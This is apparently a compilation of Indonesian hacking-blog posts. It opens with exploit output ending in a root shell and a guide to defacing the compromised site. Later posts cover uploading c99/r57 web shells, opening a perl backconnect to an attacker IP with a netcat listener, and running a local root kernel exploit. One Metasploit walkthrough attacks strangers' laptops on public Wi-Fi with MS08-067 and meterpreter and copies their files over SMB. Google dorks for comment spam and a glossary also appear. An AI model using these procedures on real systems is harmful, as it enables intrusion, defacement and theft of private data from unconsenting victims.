(40) trying: 0xb7f7dd70 slider: 0x0008# SEGV #
(41) trying: 0xb7f7dd74 slider: 0x0004# SURVIVED #
(42) trying: 0xb7f7dd72 slider: 0x0002# SEGV #
Final stack_dist: 0xb7f7dd74
EX: buf: 0x080835ec h: 0x0807d000 ret-dist: 0xb7f7dcfa

ATTACH NOW
Changing MSW of return address to: 0x0808
Crash, finding next return address
Changing MSW of return address to: 0x0809
Crash, finding next return address
Changing MSW of return address to: 0x080a
Crash, finding next return address
EX: buf: 0x080835ec h: 0x0807d000 ret-dist: 0xb7f7dcf6

ATTACH NOW
Changing MSW of return address to: 0x0808
Crash, finding next return address
Changing MSW of return address to: 0x0809
Crash, finding next return address
Changing MSW of return address to: 0x080a
Crash, finding next return address
EX: buf: 0x080835ec h: 0x0807d000 ret-dist: 0xb7f7dcfc

ATTACH NOW
Changing MSW of return address to: 0x0808
Crash, finding next return address
Changing MSW of return address to: 0x0809
No Crash, might have worked
Reply from remote: CHRIS CHRIS

***** YOU ARE IN *****

localhost.localdomain

Linux localhost.localdomain 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000
i686
unknown

uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

.....HOREEEEE...dapat root heheehehhe, nah sekarang loe udah mendapatkan fasilitas root, okeh sekarang kita mulai men-deface situs yang tedapat pada server tsb. Pertama-tama perlu kalian ketahui bahwa biasanya halaman index pada server UNIX ditempatkan pada direktori tertentu, yaitu : home/html atau home/html/httpd atau bisa juga di direktori var/html atau var/html/httpd
naH..tunggu apa lagi coba deh loe liat-liat isi direktori itu...untuk meyakinkannya loe buka situs tsb pada browser dan lihatlah apa nama dari file halaman index situs itu..hmmm biasanya sich index.html atau index.htm Udah dapat indexnya? kalo udah sekarang loe bisa echo deh...gampang kan??? heheheh..cuman kalo gue rada malas sich make echo mending bikin halaman baru...;)), gini caranya : 
  1. ganti dulu nama indexnyamv index.htm oldindex.htm
  2. sekarang buka editor dari shell, bisa make vi atau pico : vi index.htm
  3. masukan HTML yang kalian buat di vi ataupun pico tadi
  4. buka browser kalian....heheeheh..udah ganti kan sekrang halamannya..:))) SiiiPPPP..!!
Gitu aja kok caranya...mudah aja kan..?? hehehhe...intinya memang cuman bagaimana mendapatkan fasilitas root pada server, dan seperti yang telah gue bilang tadi bahwa setiap server memiliki karakteristik yang berbeda-beda sesuai dengan OS nya masing2. Sehingga diperlukan exploit yang berbeda apabila kita ingin mencoba menembus server yang memiliki OS yang berbeda pula...so many exploit out thare...just get iT..!! hehehheudah dulu yah...BUBAYYYYYY!!!!!!!!!!!!
Read More

Mencari Backlink Dengan Bantuan Syntax Google

rh3d aL3rt– Banyak  cara mencari apapun melalui Google dengan begitu akurat jika kita bener-bener menguasai/hafal di luar kepala beberapa Syntax Google Hack. Google Hack bukan berarti kita menghack Google, Tapi itu sebuah Syntax yang digunakan untuk membuat hasil pencarian Google lebih akurat. Kali ini Syntax yang bakal di catet cuma Syntax Mencari Backlink sesuai dengan keinginan kita.
Dulu saya pernah nemuin Software Google Hack yang mana kita hanya mengetikkan keyword saja & diikuti dengan pilihan Syntax yang ada. Tapi ga tau deh Software itu dimana saya downloadnya. Rasanya itu software Google sendiri deh yang buat. Coba searching aja dengan kata kunci “Google Hack Software” !

Kali ini pencarian Backlink bukan dengan Syntax Google, Tapi dilakukan secara manual yang di kenal dengan kata “Footprint”. Caranya gimana ? Tinggal buka aja Google.com, Lalu masukkan Syntaxnya yang saya tulis dibawah ini…
Blog .EDU Backlink
site:.edu inurl:blog “post a comment” -”you must be logged in” -”comments closed”
Moodle .EDU Backlink
site:.edu inurl:login “Login here using your username” “For full access to courses you’ll need to take a minute to create a new account for”
.EDU Discussion Board
site:.edu “From” “date” “time” “Remote Name” “last changed”
.EDU Forum Backlink
site:.edu “Page 1 of 1″ “Select sort method” “joined” “Website”
Sebenernya masih banyak sih, yah yang penting udah tau syntaxnya , kemudian tinggal arahin aja kata-katanya sesuai selera. Teknik pencarian Backlink ini pun bisa sangat optimal hasilnya jika sekaligus dilengkapi tool Dofollow Checker seperti SEOQuake  lainnya.
Trackback from your site.
Read More

Kamus Hacker




Hacker 
1. Back Orifice: software buatan kelompok hacker ( Cult of the Dead Cow ) yang digunakan sebagai alat bantu untuk menemukan jalan masuk ke sebuah komputer dan mengendalikannya dari jarak jauh (remote). Versi terakhir yang muncul adalah Back Orifice 2000 yang mampu secara virtual mengendalikan sebuah komputer lain dengan sistem operasi Windows. Untuk bisa menggunakannya hacker harus melakukan langkah curang sedemikian rupa sehingga calon korban menerima dan menjalankan Trojan horse (TH) dalam komputernya.TH ini lazimnya diselipkan (attach file lewat email) dalam sebuah file yang tidak berpenampilan jahat namun sebenarnya mengandung program Back Orifice server tersembunyi di balik itu.
Kalau Back Orifice berhasil terinstall di komputer korban maka bisa dipastikan hacker bisa melakukan banyak hal termasuk mengendalikan (kontrol) komputer korban dari jauh. Dari hanya sekedar melihat, menghapus, menambah file sampai merubah tampilan desktop bisa dilakukan hacker pada komputer korbannya.

2. Black hat: kalau anda anggap www itu analogi wild - wild west maka anda tentu sudah bisa menebak black hat ini ada di pihak yang jahat. Hacker black hat ini juga biasa disebut sebagai "crackers” dengan kemampuan mencuri data atau merusak sistem yang ada dalam komputer korban. Kelebihan black hat adalah kemampuannya untuk menghilangkan jejak hingga tidak bisa dilacak siapa sebenarnya pelaku serangan yang terjadi setelah tujuan tertentu mereka terpenuhi.

3. Buffer overflow: ini adalah sebuah kelemahan yang mudah untuk ditemukan dan dimanfaatkan oleh hacker dalam sebuah sistem. Aplikasi dan Operating System (OS) menyimpan untuk sementara perintah yang mereka dapat di memori tertentu yang biasa disebut buffer memory. Kalau OS atau program tidak bisa dikode secara sempurna maka hacker bisa membuat komputer korban jadi terganggu dengan mengirimkan perintah yang dibuat khusus yang membuat gangguan jadi berlangsung lebih lama. Windows 95 paling rentan kalau sudah berhadapan dengan serangan seperti buffer overflow yang banyak dilancarkan lewat internet ini.
Saat ini serangan serupa sudah jarang dilancarkan pada sebuah komputer. Namun terkadang hacker masih sering melakukannya untuk memperlambat kinerja sebuah situs.

4. Denial-of-service attack : adalah sebuah istilah yang diberikan untuk upaya serangan dengan jalan menurunkan kinerja sebuah web site dengan terus menerus mengulang request ke server dari banyak sumber secara simultan. Serangan seperti ini bertujuan membuat server korban jadi kuwalahan melayani request yang terkirim dan berakhir dengan menghentikan aktivitas atau berhenti dengan sendirinya karena tak mampu melayani request.

5. Distributed denial-of-service attack (DdoS): di masa lalu hacker hanya bisa melancarkan serangan denial-of-service attack dengan mengirimkan request dalam jumlah besar secara simultan dan kontinyu dari sebuah komputer. Namun sekarang hacker bisa mengirimkan serangan dari beberapa komputer yang diaktifkan secara remote. Pada tahun 1998 sebuah kelompok hacker menciptakan program yang memungkinkan seorang hacker mengirimkan sebuah perintah dalam jumlah besar ke komputer korban yang lain agar bisa dikendalikan secara remote. Setelah beberapa komputer korban ada dalam kendalinya, secara bersamaan komputer korban tersebut dikoordinir untuk melancarkan denial-of-service attack kepada korban lain yang menjadi target utama.
Layaknya zombie beberapa komputer yang menjadi korban sebelumnya dikendalikan secara remote untuk melakukan request secara kontinyu dan simultan ke komputer target utama. Serangan serupa DdoS ini sudah
terbukti berhasil melumpuhkan beberapa web server milik situs besar kenamaan seperti Yahoo.com dan eTrade.com. Namun dengan sebuah software pendeteksi dan pengalaman yang cukup admin jaringan di beberapa jaringan besar sudah selayaknya mampu menangkal serangan seperti ini.

6. Exploit: ini merupakan sebuah ungkapan untuk keberadaan sebuah celah keamanan dalam software yang berjalan di sebuah komputer. Lewat exploit inilah peluang untuk melakukan serangan terbuka bagi hacker.
Setiap software atau sistem operasi baru dirilis maka pada saat yang sama genderang perang ditabuh untuk memberi komando pada hacker mulai mencari kelemahannya. Setiap ada kelemahan baru ditemukan oleh para hacker maka pengumuman akan segera tersebar lewat beberapa media yang menjadi forum komuniakasi mereka. Kebanyakan kabar tersebut akan disebarkan di beberapa mailing list seperti CERT, BugTraq, Microsoft’s security bulletins dan beberapa lagi lainnya. Dengan disebarkannya penemuan tersebut pembuat software bisa mengupayakan penangkalnya. Pemakai juga bisa jadi lebih waspada akan terjadinya serangan. Dalam kebanyakan kasus yang terjadi biasanya pemakai software kurang waspada akan kelemahan software yang dipakainya padahal kabar sudah disebar dan penangkal sudah bisa didapat.

7. Firewall: adalah sebuah software program yang dipasang pada sebuah jaringan dan bertugas menjadi penghalang bobolnya akses untuk kepentingan jahat layaknya sebuah saringan. Semua aktivitas keluar dan masuk ke jaringan harus melalui penyaringan ini hingga akses tertentu yang berbahaya bisa dibatasi. Saringan ini juga bisa digunakan untuk mencegah adanya pencurian data berharga dari dalam jaringan oleh pihak lain dari luar jaringan.bisa digunakan untuk mencegah adanya pencurian data berharga dari dalam jaringan oleh pihak lain dari luar jaringan.

8. Hacktivism: adalah aktivitas penyerangan oleh hacker yang dimotivasi oleh simpati tertentu. Hal semacam ini muncul bila aktivis sosial maupun politik menggabungkan kemampuan menyerang yang dimiliki dan menggunakannya untuk kepentingan menarik simpati lebih besar atau unjuk rasa lewat internet.

9. Intrusion detection system (IDS): sama seperti firewall IDS ini merupakan penghambat semua niat jahat yang akan megganggu sebuah jaringan. Bedanya IDS ini lebih mau selangkah dengan kemampuannya memberi peringatan kepada admin server saat terjadi sebuah aktivitas tertentu yang tidak diinginkan admin sebagai penanggung jawab. Selainmemberi peringatan dini IDS juga memberi beberapa alat bantu untuk melacak jenis dan sumber aktivitas terlarang tersebut.

10. Root: istilah ini diadaptasi dari sitem UNIX dimana seorang pengguna bisa memiliki hak pengendalian terbatas pada sebuah sistem. Hacker menggunakan istilah ini untuk menggambarkan kemampuan mereka dalam melancarkan serangan dan menguasai sistem korbannya.

11. Script kiddie: sebuah pola serangan yang sering dilancarkan oleh hacker pemula dengan menggunakan alat bantu ringan yang bisa mereka dapatkan di banyak situs hacker lainnya. Alat bantu yang biasanya berisi sederetan skrip sederhana ini mereka gunakan untuk mendeface atau melancarkan DOS pada korban yang memiliki expolit. Hacker dengan jam terbang yang lebih tinggi biasanya mencibir hacker permula yang menggunakan metode ini karena biasanya mereka hanya menggunakan tanpa tahu teknologi dan konsep yang ada di balik pola serangan yang dilancarkan

12. Trojan horse: adalah sebuah aplikasi yang didesain untuk melakukan sebuah kecurangan namun terselubung dengan kebaikkan. Biasanya metoda yang dipakai adalah dengan menyelipkan (attach file lewat email) sebuah file tertentu yang mengandung trojan horse namun dengan kemasan menarik. Kalau trojan horse berhasil menginfeksi maka bisa dipastikan hacker bisa mendapat akses tak terhingga ke komputer korban. Tiga jenis trojan horse yang popular digunakan adalah Back Orifice, NetBus, dan SubSeven.

13. White hat: hacker dengan kategori ini cenderung lebih memanfaatkan pengetahuan mereka untuk memuaskan rasa ingin tahu bagi intelektualita ketimbang untuk perbuatan jahat yang merusak. Hacker seperti ini sangat anti dengan perusakan sebuah sistem, pencurian data mauoun merusak kinerja sebuah situs. Namun aktivitas mereka tetap saja menjadi tidak legal bila mereka ingin menguji sebuah sistem milik orang lain yang dimana mereka tidak memiliki otoritas untuk itu. Dalam aktivitasnya tidak jarang mereka melakukan perusakan yang tidak disengaja seperti merubah atau menghapus data yang ada. Kebanyakan hacker seperti ini bekerja secara resmi diperusahaan tertentu sebagai programer, konsultan maupun admin server.
Read More

Cara Ngeroot Target

Salam hangat untuk semuanya, banyak yang request bagaimana cara ngeroot target.
Apa sih tujuannya harus “ngeroot” atau mendapatkan akses root? Karena akses level “root” merupakan akses level tertinggi dalam UNIX, so dengan kita mendapatkan “root” maka anda bisa melakukan hal yang lebih banyak di server target.
Okelah klo begitu yuk kita mulai, beginilah cara ngeroot.
Langkah untuk ngeroot adalah:
  1. Sediakan server / pc untuk menjalankan aktifitas ngeroot
  2. Sediakan target yang sudah kita dapat dari (RFI/SHELLUPLOAD/LFI/DSB) yang safemode  (OFF)
  3. Sedikan juga shell injection tools (c99, r57, dsb) yang didalamnya tersedia fasilitas untuk backconnect / sediakan & gunakan perl backconnect tools
  4. Sediakan Netcat (NC) untuk menerima connection dari backconnect
  5. Sediakan local root exploit yang sesuai dengan kernel target
Oke, kita mulai beraksi
Asumsikan bahwa:
IPHOSTSERVER ANDA = 100.100.100.100
PORT SERVER NETCAT ANDA: 10000
Langkah pertama cara ngeroot:
Pastikan bahwa Netcat sudah terinstall & Anda sudah menjalankan Netcat pada Server Anda.
Commandnya sangat sederhana: netcat -n -l -v -p PORT
Contoh: netcat -n -l -v -p 10000

# rh3daL3rt@root:~$nc -n -l -v -p 10000 
# Listening on [any] 10000....


Langkah kedua cara ngeroot:
Pastikan bahwa anda sudah melakukan upload c99 / r57 ke server dimana didalamnya terdapat fasilitas backconnect. Jadi kita tinggal masukkan IP server kita,
Jika anda menggunakan perl backconnect tools, anda cukup ketikkan perintah: perl backconnectortools.txt IPHOSTSEVERANDA PORT
Contoh:

# perl backconnect.txt 100.100.100.100 10000

Langkah ketiga cara ngeroot:
Tunggulan sampai ada connection dari server target ke server anda, biasanya akan muncul pesan bahwa terdapat koneksi ke server anda dari target.
Contoh:

# rh3daL3rt@root:~$nc -n -l -v -p 10000 
   Listening on [any] 10000....
   Connect to [195.13.10.210] from localhost [127.0.0.1] 10000
   Linux www.target.com 2.6.16 #1 SMP Fri Jun 01 17:19:41 EST NEW 2007 i686 i686 i386    GNU/Linux
uid=48(apache) gid=48(apache) groups=48(apache)

Langkah ke-empat cara ngeroot:
Anda sudah terkoneksi ke target, disinilah anda harus pandai-pandai menggunakan command Unix. Anda bisa belajar lebih dahulu command” Unix server.
Apabila sudah terkoneksi, maka persiapkanlah LOCAL EXPLOIT UNTUK KERNEL SERVER, ada banyak tools untuk local disesuaikan dengan kebutuhan.
Karena kernel target adalah 2.6.16, maka kita akan menggunakan 2.6.16 -> raptor, raptor2, h0llyshit, prctl untuk exploitnya.
Informasi mengenai local exploit untuk masing” kernel bisa dicari google, kalau kata ulil gamal gunakan jari jemari anda untuk menemukannya :)
Oke kita lanjut, setelah itu kita wget file raptor atau bisa juga upload dari local file, kemudian kita tempatkan di yang permissionnya bisa execute. Kita cari saja yang 777 (misal: /var/tmp).
Kemudian kita jalankan perintahnya:
./raptor
w00t: uid=0(root) gid=0(root) groups=0(root)
whoami
uid=0(root) gid=0(root) groups=0(root)
Buzz, selamat anda sudah mendapatkan root.
Klo sudah dapat, dibagi bagi ya.

Read More

Tutorial Hacking dengan Metasploit

Tutorial Hacking Dengan Metasploit






Selamat Malam all, kali ini saya akan share sedikit tentang aplikasi hacker favorit saya. Yaitu adalah METAPLOIT Framework ver. 2.6. Aplikasi ini berfungsi untuk mengexploitasi kelemahan suatu system ataupun aplikasi. Aplikasi ini bisa untuk penetration testing ke System Windows, Unix/Linux, dan MacOs, tapi yang lebih cenderung Exploitable adalah Windows SP1. Untuk lebih lengkapnya dapat di baca di website resminya www.metasploit.com.
Ketika saya menulis artikel ini, metasploit sudah merilis yang versi 3.5, tapi saya menggunakan versi 2.6, karna pada dasarnya sama saja, hanya saja versi 3.5 lebih banyak exploitnya :D . Oh iya, dalam Metasploit Framework, kita sudah disediakan banyak exploit, sehingga tidak perlu mendownload lagi. Fungsi exploit yaitu mengirim bufferOverflow pada system korban, sehingga kita dapat menTakeOver shellnya.
Langsung saja, berikut installasinya di Windows.
1. Download dulu di webiste resminya www.metasploit.com, jika tak ada ver. 2.6, coba cari aja di Google, :D usaha sedikit gan.
2.  Kemudian install, dan jalankan msfweb.

Maka akan muncul window shell seperti berikut.

3. Buka Web Browser bisa Internet Explorer, Mozilla, OperaMini, dll. Dan pergi ke http://127.0.0.1:55555, maka tampilannya seperti berikut.
Mungkin tampilan web gui anda akan sedikit berbeda, karena templatenya disini telah saya ganti. :D
4. Kemudian cari corban yang akan kita exploitasi. Bisa menggunakan NMAP, terus kita lakukan port scanning. Disini kita akan mencoba pada system OS Windows Server 2003 yg masih fresh install (belum di Patch). Pada port scanning, pastikan port untuk MSRPC tebuka (default = open). Download NMAP di www.nmap.org
5.Memilih Exploit.
Pada Metasploit Web Interface, di bagian FILTER MODULES pilih “app :: dcom”, setelah itu pilih exploit Microsoft RPC DCOM MSO3-026.
Pilih target pada pilihan Select Target
6. Memilih Payload
Pilih salah satu payload diatas, jika masih bingung, pilih saja win32_bind, yang akan mengexploitasi dan langsung masuk ke command shell target. Berikut beberapa fungsi2 payload :
win32_adduser : menambah user pada system korban
win32_bind : masuk ke shell korban
win32_bind_dllinject : untuk upload / inject dll files
win32_bind_meterpreter : exploitasi dengan menjalankan meterpreter (i like it :) ).
win32_bind_vncinject : inject vncserver pada system korba (untuk kita remote melalui vncviewer).
win32_downloadexec : mendownload dan mengeksekusi aplikasi pada pc korban
win32_exec : mengeksekusi command di system korban.
Sedangkan BIND, PASSIVE, REVERSE, pada dasarnya sama saja.

RHOST ==>> Ip Address Korban (Remote).
LHOST ==>> Ip Address Kita (Local)
RPORT ==>> Port Korban
LPORT ==>> Local Open Port

Setelah diisi semua, kemudian klik exploit untuk mengHack. Hahaha :D , selamat mencoba.
Source: http://lebaksonowordpresscom/2010/11/16/hacking-dengan-metasploit-exploit/

ARTIKEL KEDUA

Wew… keren ya judulnya… sebenernya tutorial kayak gini udah banyak sih di internet, cuma lagi iseng aja pengen nulis tentang metasploit. :*Pasti kalian semua udah pada kenal apa itu metasploit, kalo pengen lebih jelasnya baca aja di websitenya metasploit.
Tapi mungkin tutorial yang saya tulis ini baru pertama, soalnya OS yang saya pake lain dari yang lain. hehe.. Biasanya OS yang dipake buat aksi exploitasi adalah Backtrack, yang memang sudah teruji kehandalannya untuk Pentest (Penetration Testing). Pengen tau OS yang saya pake… ? hehe.. :p
Nah, sekedar share aja ya… OS yang saya pake adalah TealinuxOS 2.0 yang sudah dimodifikasi untuk keperluan pentest. :D Karena TealinuxOS merupakan turunan ubuntu maka, tutorial ini juga berlaku untuk semua distro turunan Ubuntu.
Sebelum belajar metasploit yang perlu disiapkan adalah :
  • Cemilan, buat ngilangin stress kalo exploitasinya gagal mulu… hehe :p
  • OS, terserah, yang penting Linux :D
  • Metasploit Framework, bisa donlod langsung di websitenya metasploit. trus langsung di install ya …
  • fping, install langsung aja, caranya “sudo apt-get install fping”
  • nmap, install langsung juga, caranya “sudo apt-get install nmap”
  • dan yang terakhir jangan lupa siapkan KORBANnya..wkwkwk…
langkah-langkahnya ikuti aja video yang udah saya buat ini,
Tutorialnya bisa di download DISINI
Source: http://wwwmazumamwebid/2010/07/hack-windows-dengan-metasploit-di_21.html

ARTIKEL KETIGA

Rasa penasaran saya muncul ketika banyak forum security membicarakan tentang Metasploit.
Apakah itu metasploit ? Sulitkah menggunakannnya ?
Untuk memberikan gambaran dan mempermudah penjelasan, saya akan memberikan contoh bug pada service DCOM Windows yang dulu sangat populer diexploitasi dengan script exploit : KAHT .
Berikut alat-alat praktek yang kita butuhkan pada percobaan kali ini :
1. Sebuah PC yang cukup bertenaga untuk virtualisasi PC
2. Metasploit Framework, dapat di download disini
3. Microsoft Windows NT SP3-6a/2000/XP/2003 yang memiliki bug pada service DCOM.
4. Vmware, dapat di download disini
Vmware disini digunakan untuk membuat virtualisasi jaringan komputer, sehingga memudahkan anda yang hanya memiliki 1 PC saja dirumah.
Saya akan melompati langkah-langkah menginstall VMware dan juga cara menginstall Windows di VMware, sebab apabila anda tidak mengerti hal tersebut, kemungkinan besar anda juga tidak akan paham yang kita bahas disini.
Sebagai permulaan kita akan memulai dengan mengenal lebih dekat Metasploit Framework. Pada situs pembuatnya dipaparkan secara gamblang tentang apa itu Metasploit framework, dan juga tujuan penggunaannya :
What is it?
The Metasploit Framework is a development platform for creating security tools and exploits. The framework is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
What does it do?
The framework consists of tools, libraries, modules, and user interfaces. The basic function of the framework is a module launcher, allowing the user to configure an exploit module and launch it at a target system. If the exploit succeeds, the payload is executed on the target and the user is provided with a shell to interact with the payload.
Semuanya saya biarkan tertulis dalam bahasa orang bule sebab ada kata-kata yang tidak pas atau tidak bisa dipadankan bila diterjemahkan dalam Bahasa Indonesia.
Selanjutnya untuk lebih jauh tentang exploit maupun bug pada DCOM service dapat anda search sendiri di google, sebab terlalu panjang jika saya jelaskan disini.
Sekarang mari kita ngoprek komputer !
Langkah pertama adalah download Vmware dari situsnya, lalu anda dapat mulai menginstall Windows yang memiliki bug DCOM, kemudian jalankan windows anda di VMware !
Langkah kedua adalah download Metasploit Framework dari situsnya. Lalu install dikomputer anda dan jalankan, hingga keluar tampilan seperti berikut :

Kemudian pada kotak search ketikan dcom, lalu klik Find, dan pilihlah Exploits Microsoft RPC DCOM Interface Overflow.

Setelah itu kita memilih target yang akan kita exploitasi, dalam kasus kali ini Sistem Operasi target kita adalah Windows XP home, oleh karena itu pilihlah yang sesuai, lalu klik Forward :

Kemudian kita dihadapkan pada pilihan payload. Payload adalah sebuah aksi yang dilakukan setelah bug berhasil di exploitasi oleh Metasploit. Untuk pembelajaran, kita pilih Generic/Shell_Bind_TCP , artinya kita akan mengambil alih Shell Bind atau lebih dikenal di lingkungan windows dengan Command Prompt dari target hacking kita. Setelah itu klik Forward.

Langkah berikutnya kita harus menentukan Target Address kita, disini saya telah mengkonfigurasi Windows XP Home di Vmware dengan IP 192.168.126.132, oleh karena itu tuliskan ip tersebut pada kolom RHOST. Sedangkan RPORT disini sudah ditentukan yaitu port 135 yang merupakan port default dari service DCOM dimana secara default dibuka oleh Windows XP Home ! Wah, berbahaya sekali yah… Untuk LPORT disini juga sudah ditentukan yaitu 4444, Local Port akan membuka sebuah port di PC anda untuk berhubungan dengan komputer target. Selanjutnya klik Forward .

Jika target berhasil terexploitasi, anda akan mendapatkan sebuah session yang berisi target hacking kita dan siap untuk di double klik.

Kemudian anda akan mendapati sebuah layar Command Prompt dari komputer target dan anda sebagai Administrator. Jika sudah begini semua terserah anda, jangan tanyakan apa yang bisa dilakukan selanjutnya.Dan selesailah tutorial hacking kali ini Mudah bukan ?
Source: http://wwwagungsetiawanwebid

ARTIKEL KEEMPAT

Kali ini saya akan berikan cara menerobos komputer orang
di area wifi seperti hotel, kampus atau restoran
dalam hal ini tentu saja saya pake OS Linux hehehe
Tentu kita ingin tahu data apa yang ada di dalam
setelah download metasploit for linux di http://www.metasploit.com/download/
Install dengan perintah
$su
# ./namafile.run
pilih yes
tidak perlu diupdate
Ok silahkan jalan-jalan di area hotspot di kampus, mall atau cafe/restoran
jangan lupa duduk yang manis dan tenang sambil minum juice (kopi kurang baik)
Cari target komputer yang sedang aktif online
terlebih dulu cari tau nomor IP DHCP yang kita dapat.
$ sudo ifconfig -a
lihat hasilnya :
eth1 Link encap:Ethernet HWaddr 00:50:BF:1B:B5:51
inet addr:192.168.0.10 Bcast:192.168.0.255 Mask:255.255.255
itu menunjukkan kita mendapat IP 192.168.0.10
langsung scan komputer yang lagi online di area tersebut
$ nmap -sP 192.168.0.0/24
lihat hasilnya :
Host 192.168.0.1 appears to be up.
MAC Address: 00:B0:6C:EF:47:30 (Unknown)
Host arman (192.168.0.10) appears to be up.
Host 192.168.0.1 appears to be up.
MAC Address: 00:E0:4C:ED:41:20 (Unknown)
Host mycomp (192.168.0.11) appears to be up.
MAC Address: 00:E0:5C:FD:45:17 (Unknown)
dan seterusnya……………
OK pilih salah satu target (korban) yaitu : 192.168.0.11
Lakukan ping dulu ke IP korban. sapa tau sudah dipasang firewall
$ ping 192.168.0.11
Jika hasilnya reply maka siap melakukan langkah berikutnya
Scan port yang terbuka terlebih dahulu
$ nmap 192.168.0.11
lihat hasilnya:
PORT STATE SERVICE
139/tcp open nb-session
445/tcp open microsoft-ds
8080/tcp open http-proxy
OK port 445 terbuka dan sasaran empuk untuk menyusup kesana
lakukan urutan exploitasi berikut:
Jalankan metasploit
$ msfconsole
Pilih jenis tools untuk exploit
msf> use windows/smb/ms08_067_netapi
Pilih metode penyerangan
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
Tambahkan target IP korban
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.11
Langsung lakukan exploit
msf exploit(ms08_067_netapi) > exploit
jika muncul prompt dibawah ini brarti serangan berhasil
meterpreter>
Eiits tunggu dulu ini belum menguasai komputer korban sepenuhnya
Tinggal satu perintah lagi, setelah itu baru bisa diapa-apain.
meterpreter> execute -M -f cmd.exe -i
lihat hasilnya :
C:\Windows\System32>
nah kita sudah masuk sepenuhnya… mau diapain nih?
jangan dirusak lah kasihan.. kita copy saja datanya ke komputer kita
barangkali ada surat rahasia atau data korupsi hehehe..
OK persiapan untuk copy data
Pastikan Linux kita sudah ada samba dan service sudah started
Sharinglah sebuah folder di linux kita dengan permission read and write
jangan lupa juga : $ sudo chmod 777 nama-folder
disini saya kasih contoh nama folder saya “didit”
OK Kembali ke komputer korban (target)
cari dulu data yang dianggap penting..
biasanya ditaruh di D:\ atau di My Documents
misalnya data yang kita incar ada di D:\ maka lakukan perintah berikut :
C:\Windows\System32>D:
D:\>dir
05/25/2010 10:57 PM 22.700 rahasia.doc
Nah tuh ada file bernama “rahasia.doc”
selanjutnya kita buat mapping drive ke komputer kita
D:\>net use Z: \\192.168.0.10\didit
OK tinggal copy file “rahasia.doc” ke drive Z: yang sebenarnya adalah komputer kita
D:\>copy rahasia.doc Z:
segera tutup drive Z: agar ga ketahuan oleh korban
D:\>net use /delete Z:
OK aman
Silahkan buka file “rahasia.doc” di folder “didit” menggunakan openoffice
Gampang kan..
Nah seperti etika hacking yang ada pada umumnya
kita bukan hanya memberi cara menerobos tapi juga cara mengamankannya
Yang pertama pakailah Linux hehehe
Jika terpaksa pakai windows maka:
download worm cleaner di http://www.softpedia.com/progDownload/Windows-Worms-Doors-Cleaner-Download-107294.html
lalu buka file tersebut maka otomatis akan menutup port 445
jika ingin membuka lagi port tersebut cukup klik tombol enabled
Jangan lupa aktifkan firewall anda.
Sekian dan terima kasih…
Source: http://saifulanaswordpresscom/2010/05/26/hacking-pake-metasploit/

ARTIKEL KELIMA

Armitage adalah sebuah Tools Grafis (Windows & Linux) untuk manajemen serangan yang digunakan pada Metasploit yang mampu memvisualisasikan target anda, merekomendasikan eksploitasi, dan memperlihatkan kemampuan canggih melalu sebuah skema. Armitage bertujuan untuk membuat Metasploit dapat digunakan untuk praktisi keamanan yang mengerti hacking. Jika Anda ingin belajar Metasploit dan melihat fitur-fitur canggih yang disiapkan, Armitage bisa jadi solusi anda.
Armitage mengatur kemampuan Metasploit saat proses hacking. Terdapat fitur untuk Discovery, akses, Post-exploitation, dan penetrasi/Manuver.
Untuk penemuan, Armitage mengekspos beberapa fitur-fitur manajemen host Metasploit. Anda dapat mengimpor host dan menjalankan scan pada database sasaran. Armitage juga memvisualisasikan database target sehingga anda akan selalu tahu mana host Anda bekerja dan di mana Anda memiliki session.

Armitage membantu dengan Remote Exploitation – menyediakan fitur untuk secara otomatis merekomendasikan eksploitasi yang akan digunakan dan bahkan menjalankan check aktif sehingga Anda tahu mana eksploitasi yang akan bekerja. Jika pilihan ini gagal, Anda dapat menggunakan pendekatan Hail Mary approach dan melepaskan db_autopwn terhadap database target Anda.
Armitage memaparkan fitur klien-sisi Metasploit. Anda dapat memulai browser exploits, menghasilkan malicous file, dan membuat executable meterpreter.
Setelah Anda masuk, Armitage menyediakan beberapa tools yang dibangun pasca-eksploitasi dengan kemampuan dari meterpreter agent. Dengan klik menu Anda akan memperoleh keistimewaan berupa, dump hash password untuk local credentials database, Browse file, dan meluncurkan Command Shell.

Yang terkahir, Armitage membantu proses pengaturan pivoting, yaitu sebuah kemampuan yang memungkinkan Anda menggunakan compromised host sebagai platform untuk menyerang host lain dan menyelidiki lebih lanjut jaringan target dengan kata lain Metasploit bisa meluncurkan serangan dari host yg dikompromikan dan menerima sesi pada host yang sama. Selain itu Armitage juga mengekspos modul SOCKS proxy Metasploit, yang memungkinkan tools eksternal untuk mengambil keuntungan dari pivoting. Dengan tools ini, Anda dapat lebih mengeksplorasi dan melakukan penetrasi maksimal melalui jaringan.
Untuk menggunakan Armitage, Anda memerlukan berikut ini:
* Linux atau Windows
* Java 1.6
* Metasploit Framework 3.5
* Database dikonfigurasi. Pastikan Anda tahu username, password, dan host.

Untuk Mendapatkan Armitage, Silahkan Download disini:

Windows – armitage112510.zip
Linux – armitage112510.tgz
————————————————————————–
Refrensi:
- http://www.fastandeasyhacking.com/manual
- http://www.darknet.org.uk/2010/12/ar…or-metasploit/
- http://www.commonexploits.com/
————————————————————————–
Semoga Bermanfaat.
Salam Black HAT


Read More

vBulletin XSS Exploitation

Latar Belakang Kita semua pasti mengetahui mengenai aplikasi vBulletin.

Ya vBulletin merupakan aplikasi forum dimana ketika kita mendengar mengenai aplikasi tersebut, terlintas di pikiran kita adalah suatu aplikasi yang “cukup aman”.Tetapi seiring dengan perkembangannya, ada beberapa fitur yang ditambahkan semisal “profile customization”, sehingga tidak menutup kemungkinan akan munculnya vulnerability/kelemahan baru dalam aplikasi tersebut.
Pada area kustomisasi, pengguna sangat mungkin untuk menambahkan atau merubah kode warna seperti : #00112233, kode RGB seperti rgb(255, 255, 255) dan bahkan gambar!. Ini sangat dimungkinkan dengan menambahkan url(‘path/ke/gambar.jpg’). Bahkan bisa lebih dari itu…

vBulletin Dengan fitur baru dari vBulletin cms ini dimana sistem dapat menerima input dari user, sangat dimungkinkan untuk disisipi kode-kode tertentu untuk kepentingan tertentu. Misalnya memasukkan string tertentu ?’ABCD”/\>< .


vBulletin Seperti yang terlihat pada gambar diatas, kustomisasi profil pada vBulletin mengijinkan karakter untuk dimasukkan(bahkan meskipun inputan tersebut invalid).
